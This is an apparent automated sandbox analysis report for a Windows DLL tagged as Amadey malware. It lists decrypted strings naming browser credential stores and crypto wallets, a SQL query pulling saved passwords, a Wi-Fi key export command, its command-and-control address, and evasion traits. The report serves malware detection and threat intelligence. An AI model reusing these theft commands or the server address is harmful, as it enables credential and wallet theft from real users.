Windows Analysis Report
uLV6jN2BWh.dll

Overview

General Information

Sample name:	uLV6jN2BWh.dll renamed because original name is a hash value
Original sample name:	9fcac34b8162651f29288e1ffff9394d.dll
Analysis ID:	1542876
MD5:	9fcac34b8162651f29288e1ffff9394d
SHA1:	68f2eb355162fbe260c6f7256d2a13fa5e6227d0
SHA256:	61e770436568881a68dc2c4db3e84f33a89f5d7068f5988582c133cbe7c9519c
Tags:	32Amadeydllexetrojan
Infos:

Detection

Score:	56
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

System process connects to network (likely due to code injection or exploit)

Found potential dummy code loops (likely to delay analysis)

Sample uses string decryption to hide its real strings

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Classification

Signatures

AV Detection

Sample uses string decryption to hide its real strings

Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: 185.215.113.217
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: /CoreOPT/index.php
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: S-%lu-
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Mozilla\Firefox\Profiles\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \logins.json
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Exodus\exodus.wallet\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Exodus
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Electrum(
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: electrum_data\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FeatureUsage\AppSwitched
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Armory\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Armory
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM ArmoryQt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Dogecoin\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dogecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Litecoin\wallets
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Litecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM litecoin-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: DashCore\wallets\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dashcore
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM dash-qt.exe /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Telegram(
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \emoji
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \user_data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \dictionaries
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Telegram
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Telegram.exe
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Desktop.zip
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Files_\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: atomic\Local Storage\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Atomic
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Taskkill /IM "Atomic Wallet.exe" /F
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: configs
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chrome
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Google\Chrome\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Google\Chrome\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Opera Software\Opera Stable\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Opera Software\Opera Stable\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Microsoft\Edge\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Microsoft\Edge\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Sputnik
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \SputnikLab\Sputnik\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \SputnikLab\Sputnik\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chromium
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chromium\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chromium\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Orbitum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Orbitum\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Orbitum\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Vivaldi
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Vivaldi\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Vivaldi\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Comodo
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Comodo\Dragon\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Comodo\Dragon\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: CocCoc
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CocCoc\Browser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CocCoc\Browser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chedot
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chedot\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \Chedot\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: CentBrowser
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CentBrowser\User Data\Default\Login Data
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \CentBrowser\User Data\Local State
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: netsh wlan export profile name=
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: folder=
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: key=clear
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: S-%lu-
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Exodus
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Electrum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Armory\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Armory
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Dogecoin\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dogecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Litecoin
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Dashcore
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: \emoji
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: key_datas
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Telegram
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: tdata\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Files_\
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: _Atomic
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: configs
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chrome
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Sputnik
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chromium
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Orbitum
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Vivaldi
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Comodo
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: CocCoc
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: Chedot
Source: 10.2.rundll32.exe.6fb90000.0.unpack	String decryptor: folder=

Uses 32bit PE files

Source: uLV6jN2BWh.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: uLV6jN2BWh.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB9BCEE FindFirstFileExW,

7_2_6FB9BCEE

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.217 80

Jump to behavior

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: global traffic	HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.217

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB91EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

7_2_6FB91EC0

Source: unknown

HTTP traffic detected: POST /CoreOPT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.217Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1

Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000D9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php)
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php/J
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php4
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.php5Y
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpV
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpdY
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/CoreOPT/index.phpl
Source: rundll32.exe, 0000000A.00000002.4530873570.000000000075F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.217/NF1d

Contains functionality for read data from the clipboard

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB931B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6FB931B0

Contains functionality to read the clipboard data

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB931B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6FB931B0

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB931B0		7_2_6FB931B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FBA1AB1		7_2_6FBA1AB1

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6FB96B05 appears 47 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6FB973B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6FB95D90 appears 103 times

Uses 32bit PE files

Source: uLV6jN2BWh.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal56.evad.winDLL@18/0@0/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:120:WilError_03

Source: uLV6jN2BWh.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\uLV6jN2BWh.dll,Main	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: uLV6jN2BWh.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: uLV6jN2BWh.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: uLV6jN2BWh.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: uLV6jN2BWh.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 2307	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 7688	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 1015	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Window / User API: threadDelayed 8983	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep count: 2307 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep time: -2307000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep count: 7688 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6148	Thread sleep time: -7688000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep count: 1015 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep time: -1015000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep count: 8983 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7152	Thread sleep time: -8983000s >= -30000s	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB9BCEE FindFirstFileExW,

7_2_6FB9BCEE

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8q8q
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.000000000071A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.4530873570.0000000000778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.4530891630.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX@

Anti Debugging

Found potential dummy code loops (likely to delay analysis)

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 42% for more than 60s

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB97288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_6FB97288

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB9A254 mov eax, dword ptr fs:[00000030h]		7_2_6FB9A254
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB9B881 mov eax, dword ptr fs:[00000030h]		7_2_6FB9B881

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB9D218 GetProcessHeap,

7_2_6FB9D218

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB96B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6FB96B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB97288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6FB97288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6FB99820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6FB99820

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 185.215.113.217 80

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\uLV6jN2BWh.dll",#1

Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB970A7 cpuid

7_2_6FB970A7

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6FB973F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_6FB973F8

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
